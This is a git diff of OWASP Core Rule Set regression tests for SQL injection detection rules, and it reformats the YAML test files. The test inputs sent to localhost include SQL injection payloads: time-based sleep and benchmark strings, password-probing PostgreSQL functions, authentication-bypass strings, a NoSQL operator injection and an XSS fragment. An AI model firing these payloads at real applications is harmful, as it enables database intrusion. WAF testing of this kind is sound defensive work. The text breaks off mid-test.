test_title: 942151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=starts_with(password,'a')::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 11 desc: "SQL injection using unistr() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=unistr(password)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 6b2576b89..2d6ce1b1e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml @@ -2,54 +2,50 @@ meta: author: "Franziska Bühler, azurit" description: Various SQL injection tests - enabled: true - name: 942152.yaml +rule_id: 942152 tests: - - test_title: 942152-1 + - test_id: 1 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_id: 2 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_id: 3 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942152" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index 86811feb2..b499f63f2 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -2,174 +2,162 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" description: None - enabled: true - name: 942160.yaml tests: - - test_title: 942160-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/if(now()=sysdate(),sleep(12),0)" - version: HTTP/1.0 - output: - log_contains: id "942160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 6dff839b3..63b5b547e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -2,70 +2,64 @@ meta: author: "Franziska Bühler, azurit" description: None - enabled: true - name: 942170.yaml tests: - - test_title: 942170-1 + - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3B%20sleep%280%29" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=I%20sleep%20well%21" - version: HTTP/1.0 - output: - no_log_contains: id "942170" - - test_title: 942170-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + no_log_contains: id "942170" + - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=select+if(x" - version: HTTP/1.0 - output: - log_contains: id "942170" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=select+if(x" + version: HTTP/1.0 + output: + log_contains: id "942170" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index b467c61d0..aba2a2cdc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -2,136 +2,126 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942180.yaml tests: - - test_title: 942180-1 + - test_id: 1 desc: "basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/get?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - test_title: 942180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/get?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" - version: HTTP/1.0 - output: - log_contains: id "942251" - - test_title: 942251-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log_contains: id "942251" + - test_id: 2 desc: "Detects having injections negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=having%20fun" - version: HTTP/1.0 - output: - no_log_contains: id "942251" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=having%20fun" + version: HTTP/1.0 + output: + no_log_contains: id "942251" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index 08d6b996f..2752383ae 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, Christian Folini, azurit" description: None - enabled: true - name: 942260.yaml tests: - - test_title: 942260-1 + - test_id: 1 desc: "Basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something LIKE ' - uri: "/get?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/get?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log_contains: id "942260" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 812a06146..79bd21e70 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -2,38 +2,34 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942270.yaml tests: - - test_title: 942270-1 + - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" - - test_title: 942270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" + - test_id: 2 desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=Xunionselectfrom" - version: HTTP/1.0 - output: - log_contains: id "942270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 7608a7f2d..1da867fc0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -2,39 +2,35 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942280.yaml tests: - - test_title: 942280-1 + - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" - - test_title: 942280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" + - test_id: 2 desc: "SQL Server waitfor delay attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942280" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942280" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index 82f810d9a..0de6db8f1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -2,160 +2,149 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 942290.yaml tests: - - test_title: 942290-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$ne]=2" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-2 + - input: + dest_addr: 